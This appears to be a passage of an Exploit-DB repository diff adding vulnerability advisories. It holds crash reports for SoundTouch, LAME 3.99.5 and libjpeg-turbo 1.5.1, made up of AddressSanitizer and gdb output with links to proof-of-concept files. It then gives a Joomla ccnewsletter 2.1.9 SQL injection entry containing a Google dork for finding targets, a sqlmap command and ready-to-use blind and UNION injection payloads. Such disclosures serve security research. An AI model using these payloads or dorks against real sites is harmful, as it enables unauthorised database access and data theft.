#1 0x7f5076e055db in soundtouch::FIFOSampleBuffer::ensureCapacity(unsigned int) /home/a/Downloads/soundtouch/source/SoundTouch/FIFOSampleBuffer.cpp:174
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/a/Downloads/soundtouch/source/SoundTouch/sse_optimized.cpp:120 soundtouch::TDStretchSSE::calcCrossCorr(float const*, float const*, double&)
Shadow bytes around the buggy address:
0x0c4a7fff8dd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a7fff8de0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a7fff8df0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a7fff8e00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a7fff8e10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c4a7fff8e20: 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c4a7fff8e30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c4a7fff8e40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c4a7fff8e50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c4a7fff8e60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c4a7fff8e70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
ASan internal: fe
==87598==ABORTING
POC:
SoundTouch_1.9.2_heap_buffer_overflow.wav
CVE:
CVE-2017-9260
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42389.zip

191
platforms/linux/dos/42390.txt Executable file
View file

@ -0,0 +1,191 @@
LAME multiple vulnerabilities
================
Author : qflb.wu
===============
Introduction:
=============
Following the great history of GNU naming, LAME originally stood for LAME Ain't an Mp3 Encoder.
LAME is an educational tool to be used for learning about MP3 encoding. The goal of the LAME project is to use the open source model to improve the psycho acoustics, noise shaping and speed of MP3.
Affected version:
=====
3.99.5
Vulnerability Description:
==========================
1.
the fill_buffer_resample function in libmp3lame/util.c in LAME 3.99.5 can cause a denial of service(heap-buffer-overflow and application crash) via a crafted wav file.
./lame lame_3.99.5_heap_buffer_overflow.wav out
==26618==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60c000009f08 at pc 0x5f3a1e bp 0x7ffdfaf74620 sp 0x7ffdfaf74618
READ of size 4 at 0x60c000009f08 thread T0
#0 0x5f3a1d in fill_buffer_resample /home/a/Downloads/lame-3.99.5/libmp3lame/util.c:606
#1 0x5f3a1d in fill_buffer /home/a/Downloads/lame-3.99.5/libmp3lame/util.c:677
#2 0x55257c in lame_encode_buffer_sample_t /home/a/Downloads/lame-3.99.5/libmp3lame/lame.c:1736
#3 0x55257c in lame_encode_buffer_template /home/a/Downloads/lame-3.99.5/libmp3lame/lame.c:1891
#4 0x553de1 in lame_encode_buffer_int /home/a/Downloads/lame-3.99.5/libmp3lame/lame.c:1963
#5 0x488ba9 in lame_encoder_loop /home/a/Downloads/lame-3.99.5/frontend/lame_main.c:462
#6 0x488ba9 in lame_encoder /home/a/Downloads/lame-3.99.5/frontend/lame_main.c:531
#7 0x483c40 in lame_main /home/a/Downloads/lame-3.99.5/frontend/lame_main.c:707
#8 0x48bee1 in c_main /home/a/Downloads/lame-3.99.5/frontend/main.c:470
#9 0x48bee1 in main /home/a/Downloads/lame-3.99.5/frontend/main.c:438
#10 0x7ff8c8771f44 (/lib/x86_64-linux-gnu/libc.so.6+0x21f44)
#11 0x481a6c in _start (/home/a/Downloads/lame-3.99.5/frontend/lame+0x481a6c)
0x60c000009f08 is located 8 bytes to the right of 128-byte region [0x60c000009e80,0x60c000009f00)
allocated by thread T0 here:
#0 0x46ba59 in calloc (/home/a/Downloads/lame-3.99.5/frontend/lame+0x46ba59)
#1 0x5f1302 in fill_buffer_resample /home/a/Downloads/lame-3.99.5/libmp3lame/util.c:561
#2 0x5f1302 in fill_buffer /home/a/Downloads/lame-3.99.5/libmp3lame/util.c:677
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/a/Downloads/lame-3.99.5/libmp3lame/util.c:606 fill_buffer_resample
Shadow bytes around the buggy address:
0x0c187fff9390: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa
0x0c187fff93a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c187fff93b0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x0c187fff93c0: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa
0x0c187fff93d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c187fff93e0: fa[fa]fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x0c187fff93f0: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa
0x0c187fff9400: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c187fff9410: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x0c187fff9420: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa
0x0c187fff9430: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
ASan internal: fe
==26618==ABORTING
POC:
lame_3.99.5_heap_buffer_overflow.wav
CVE:
CVE-2017-9410
2.
the fill_buffer_resample function in libmp3lame/util.c in LAME 3.99.5 can cause a denial of service(invalid memory read and application crash) via a crafted wav file.
./lame lame_3.99.5_invalid_memory_read_1.wav out
==30841==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000005f24ed sp 0x7ffee94d3050 bp 0x000000000000 T0)
#0 0x5f24ec in fill_buffer_resample /home/a/Downloads/lame-3.99.5/libmp3lame/util.c:608
#1 0x5f24ec in fill_buffer /home/a/Downloads/lame-3.99.5/libmp3lame/util.c:677
#2 0x55257c in lame_encode_buffer_sample_t /home/a/Downloads/lame-3.99.5/libmp3lame/lame.c:1736
#3 0x55257c in lame_encode_buffer_template /home/a/Downloads/lame-3.99.5/libmp3lame/lame.c:1891
#4 0x553de1 in lame_encode_buffer_int /home/a/Downloads/lame-3.99.5/libmp3lame/lame.c:1963
#5 0x488ba9 in lame_encoder_loop /home/a/Downloads/lame-3.99.5/frontend/lame_main.c:462
#6 0x488ba9 in lame_encoder /home/a/Downloads/lame-3.99.5/frontend/lame_main.c:531
#7 0x483c40 in lame_main /home/a/Downloads/lame-3.99.5/frontend/lame_main.c:707
#8 0x48bee1 in c_main /home/a/Downloads/lame-3.99.5/frontend/main.c:470
#9 0x48bee1 in main /home/a/Downloads/lame-3.99.5/frontend/main.c:438
#10 0x7f48b8cacf44 (/lib/x86_64-linux-gnu/libc.so.6+0x21f44)
#11 0x481a6c in _start (/home/a/Downloads/lame-3.99.5/frontend/lame+0x481a6c)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/a/Downloads/lame-3.99.5/libmp3lame/util.c:608 fill_buffer_resample
==30841==ABORTING
POC:
lame_3.99.5_invalid_memory_read_1.wav
CVE:
CVE-2017-9411
3.
the unpack_read_samples function in frontend/get_audio.c in LAME 3.99.5 can cause a denial of service(invalid memory read and application crash) via a crafted wav file.
./lame lame_3.99.5_invalid_memory_read_2.wav out
(gdb) r
Starting program: lame file out
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/libthread_db.so.1".
Program received signal SIGSEGV, Segmentation fault.
0x080f27b3 in unpack_read_samples (samples_to_read=-146880,
bytes_per_sample=<optimized out>, swap_order=-2088828928,
pcm_in=0xb6303d80, sample_buffer=<optimized out>) at get_audio.c:1204
1204 GA_URS_IFLOOP(1)
(gdb) disassemble 0x080f27b3,0x080f27ff
Dump of assembler code from 0x80f27b3 to 0x80f27ff:
=> 0x080f27b3 <get_audio_common+4051>:mov 0x20000000(%eax),%al
0x080f27b9 <get_audio_common+4057>:test %al,%al
0x080f27bb <get_audio_common+4059>:je 0x80f27d0 <get_audio_common+4080>
0x080f27bd <get_audio_common+4061>:mov $0x8320b78,%edx
0x080f27c2 <get_audio_common+4066>:and $0x7,%edx
0x080f27c5 <get_audio_common+4069>:add $0x3,%edx
0x080f27c8 <get_audio_common+4072>:cmp %al,%dl
0x080f27ca <get_audio_common+4074>:jge 0x80f6715 <get_audio_common+20277>
0x080f27d0 <get_audio_common+4080>:xor $0xf879,%ebx
0x080f27d6 <get_audio_common+4086>:add 0x8320b78,%ebx
0x080f27dc <get_audio_common+4092>:mov %ebx,%eax
0x080f27de <get_audio_common+4094>:shr $0x3,%eax
0x080f27e1 <get_audio_common+4097>:mov 0x20000000(%eax),%al
0x080f27e7 <get_audio_common+4103>:test %al,%al
0x080f27e9 <get_audio_common+4105>:je 0x80f27f8 <get_audio_common+4120>
0x080f27eb <get_audio_common+4107>:mov %ebx,%edx
0x080f27ed <get_audio_common+4109>:and $0x7,%edx
0x080f27f0 <get_audio_common+4112>:cmp %al,%dl
0x080f27f2 <get_audio_common+4114>:jge 0x80f6727 <get_audio_common+20295---Type <return> to continue, or q <return> to quit---
0x080f27f8 <get_audio_common+4120>:incb (%ebx)
0x080f27fa <get_audio_common+4122>:movl $0x7c3c,%gs%edi)
End of assembler dump.
(gdb) i r
eax 0x837f0000-2088828928
ecx 0x24489288
edx 0xbfee5e20-1074897376
ebx 0x7c3c31804
esp 0xbfee4c200xbfee4c20
ebp 0xbfee82780xbfee8278
esi 0xfffffcf2-782
edi 0xfffffffc-4
eip 0x80f27b30x80f27b3 <get_audio_common+4051>
eflags 0x10246[ PF ZF IF RF ]
cs 0x73115
ss 0x7b123
ds 0x7b123
es 0x7b123
fs 0x00
gs 0x3351
(gdb) x/20x 0x837f0000
0x837f0000:Cannot access memory at address 0x837f0000
POC:
lame_3.99.5_invalid_memory_read_2.wav
CVE:
CVE-2017-9412
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42390.zip

141
platforms/linux/dos/42391.txt Executable file
View file

@ -0,0 +1,141 @@
libjpeg-turbo denial of service vulnerability
======================
Author : qflb.wu
CVE : CVE-2017-9614
======================
Introduction:
=============
libjpeg-turbo is a JPEG image codec that uses SIMD instructions (MMX, SSE2, AVX2, NEON, AltiVec) to accelerate baseline JPEG compression and decompression on x86, x86-64, ARM, and PowerPC systems.
Affected version:
=====
1.5.1
Vulnerability Description:
==========================
the fill_input_buffer function in jdatasrc.c in libjpeg-turbo 1.5.1 can cause a denial of service(invalid address and application crash) via a crafted jpg file.
I found this bug when I test stills2dv-alpha-0.601 which used the libjpeg-turbo.
./stills2dv exampleworkfile.s2d
(the exampleworkfile.s2d contains the path of the poc jpg file)
----debug info:----
gdb-peda$ bt
#0 __memcpy_sse2 () at ../sysdeps/x86_64/multiarch/../memcpy.S:166
#1 0x00007ffff6d82323 in __GI__IO_file_xsgetn (fp=0x61c370,
data=<optimized out>, n=0x1000) at fileops.c:1387
#2 0x00007ffff6d7786f in __GI__IO_fread (buf=<optimized out>, size=0x1,
count=0x1000, fp=0x61c370) at iofread.c:42
#3 0x00007ffff7b6e23b in fill_input_buffer (cinfo=0x7fffffffe190)
at jdatasrc.c:107
#4 0x00007ffff7b7beef in get_dqt (cinfo=0x7fffffffe190) at jdmarker.c:516
#5 0x00007ffff7b7dba3 in read_markers (cinfo=0x7fffffffe190)
at jdmarker.c:1050
#6 0x00007ffff7b795fd in consume_markers (cinfo=0x7fffffffe190)
at jdinput.c:320
#7 0x00007ffff7b6c853 in jpeg_finish_decompress (cinfo=0x7fffffffe190)
at jdapimin.c:399
#8 0x0000000000402da0 in readjpg (
fn=fn@entry=0x61c2f4 "example_data_files/test.jpg") at s2d_jpg.c:148
#9 0x0000000000403c5b in openImage (
fn=0x61c2f4 "example_data_files/test.jpg", cache=0xffffffff)
at s2d_main.c:202
#10 0x00000000004063a5 in splitted2struct (p=p@entry=0x60acc0 <ms>,
strs=strs@entry=0x61c2a0) at s2d_main.c:1139
#11 0x000000000040240b in main (argc=argc@entry=0x2,
argv=argv@entry=0x7fffffffe5f8) at s2d_main.c:1404
#12 0x00007ffff6d2af45 in __libc_start_main (main=0x402040 <main>, argc=0x2,
argv=0x7fffffffe5f8, init=<optimized out>, fini=<optimized out>,
rtld_fini=<optimized out>, stack_end=0x7fffffffe5e8) at libc-start.c:287
#13 0x0000000000402500 in _start ()
=================================================================================
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x00007ffff7b6e233107 nbytes = JFREAD(src->infile, src->buffer, INPUT_BUF_SIZE);
gdb-peda$
[----------------------------------registers-----------------------------------]
RAX: 0x61ce30 --> 0x464a1000e0ffd8ff
RBX: 0x7fffffffe190 --> 0x7fffffffe0e0 --> 0x7ffff7b89ce0 (<error_exit>:push rbp)
RCX: 0x61c370 ("example_data_files/test.jpg")
RDX: 0x1000
RSI: 0x1
RDI: 0x61ce30 --> 0x464a1000e0ffd8ff
RBP: 0x7fffffffdff0 --> 0x7fffffffe050 --> 0x7fffffffe070 --> 0x7fffffffe0a0 --> 0x7fffffffe0c0 --> 0x61c370 ("example_data_files/test.jpg")
RSP: 0x7fffffffdfd0 --> 0x7fffffffe030 --> 0x0
RIP: 0x7ffff7b6e236 (<fill_input_buffer+56>
R8 : 0x67706a2e747365 ('est.jpg')
R9 : 0x7ffff70ca7b8 --> 0x623770 --> 0x0
R10: 0x7fffffffde90 --> 0x0
R11: 0x7ffff7b6c74c (<jpeg_finish_decompress>:push rbp)
R12: 0x61c2f4 ("example_data_files/test.jpg")
R13: 0x61c5b0 --> 0x61c370 ("example_data_files/test.jpg")
R14: 0xc00 ('')
R15: 0x3
EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x7ffff7b6e229 <fill_input_buffer+43>:mov edx,0x1000
0x7ffff7b6e22e <fill_input_buffer+48>:mov esi,0x1
0x7ffff7b6e233 <fill_input_buffer+53>:mov rdi,rax
=> 0x7ffff7b6e236 <fill_input_buffer+56>:
call 0x7ffff7b477f0 <fread@plt>
0x7ffff7b6e23b <fill_input_buffer+61>:mov QWORD PTR [rbp-0x10],rax
0x7ffff7b6e23f <fill_input_buffer+65>:cmp QWORD PTR [rbp-0x10],0x0
0x7ffff7b6e244 <fill_input_buffer+70>:
jne 0x7ffff7b6e2bb <fill_input_buffer+189>
0x7ffff7b6e246 <fill_input_buffer+72>:mov rax,QWORD PTR [rbp-0x8]
Guessed arguments:
arg[0]: 0x61ce30 --> 0x464a1000e0ffd8ff
arg[1]: 0x1
arg[2]: 0x1000
arg[3]: 0x61c370 ("example_data_files/test.jpg")
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffdfd0 --> 0x7fffffffe030 --> 0x0
0008| 0x7fffffffdfd8 --> 0x7fffffffe190 --> 0x7fffffffe0e0 --> 0x7ffff7b89ce0 (<error_exit>:push rbp)
0016| 0x7fffffffdfe0 --> 0x5bffffe0bc
0024| 0x7fffffffdfe8 --> 0x61c880 --> 0x61d028 --> 0x0
0032| 0x7fffffffdff0 --> 0x7fffffffe050 --> 0x7fffffffe070 --> 0x7fffffffe0a0 --> 0x7fffffffe0c0 --> 0x61c370 ("example_data_files/test.jpg")
0040| 0x7fffffffdff8 --> 0x7ffff7b7beef (<get_dqt+71>:test eax,eax)
0048| 0x7fffffffe000 --> 0x0
0056| 0x7fffffffe008 --> 0x7fffffffe190 --> 0x7fffffffe0e0 --> 0x7ffff7b89ce0 (<error_exit>:push rbp)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x00007ffff7b6e236107 nbytes = JFREAD(src->infile, src->buffer, INPUT_BUF_SIZE);
gdb-peda$ x/20x $rdi
0x61ce30:0x464a1000e0ffd8ff0x1c00020101004649
0x61ce40:0x4300dbff00001c000x28191e231e1c2800
0x61ce50:0x3c30282b2d2321230x587b3c37373c4164
0x61ce60:0x8f9699809164495d0xa0c3e6b4a08a8c80
0x61ce70:0xcbffc88c8aaddaaa0xc19bfffffff5eeda
0x61ce80:0xfffde6fffaffffff0x2d2b014300dbfff8
0x61ce90:0x764141763c353c2d0xf8f8f8f8a58ca5f8
0x61cea0:0xf8f8f8f8f8f8f8f80xf8f8f8f8f8f8f8f8
0x61ceb0:0xf8f8f8f8f8f8f8f80xf8f8f8f8f8f8f8f8
0x61cec0:0xf8f8f8f8f8f8f8f80xc0fff8f8f8f8f8f8
gdb-peda$ ni
Program received signal SIGSEGV, Segmentation fault.
POC:
test.jpg;exampleworkfile.s2d
CVE:
CVE-2017-9614
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42391.zip

44
platforms/php/webapps/42387.txt Executable file
View file

@ -0,0 +1,44 @@
"Joomla Component ccnewsletter 2.1.9 - 'sbid' Parameter SQL Injection"
# Exploit Title: Joomla Component ccnewsletter 2.1.9 - SQL Injection
# Date: 07-26-2017
# Exploit Author: Shahab Shamsi
# Vendor Homepage: https://extensions.joomla.org/extension/ccnewsletter/
# Version: = 2.1.9 [Final Version]
# Tested on: Win,Linux
# Google Dork: inurl:"index.php?option=com_ccnewsletter" inurl:sbid
# Video Refrence: http://securityman.org/joomla-component-ccnewsletter-2-1-9-sql-injection/
Sqlmap:
sqlmap -u "http://Target/index.php?option=com_ccnewsletter&view=detail&id=73&sbid=[SQL]&tmpl=newsletter" -p sbid --dbs
Testing Method:
- boolean-based blind
- time-based blind
- UNION query
Parameter: sbid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: option=com_ccnewsletter&view=detail&id=73&sbid=185 AND 3881=3881&tmpl=newsletter
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: option=com_ccnewsletter&view=detail&id=73&sbid=185 AND SLEEP(5)&tmpl=newsletter
Type: AND/OR time-based blind
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: option=com_ccnewsletter&view=detail&id=73&sbid=-3094 UNION ALL SELECT NULL,NULL,CONCAT(0x7162626a71,0x4357474c4d556472646b43704f44476e64694f6a6d6d6873795552656d5446767846466e63677974,0x71766b6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- CCQB&tmpl=newsletter
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT * FROM (SELECT(SLEEP(5)))GDiu)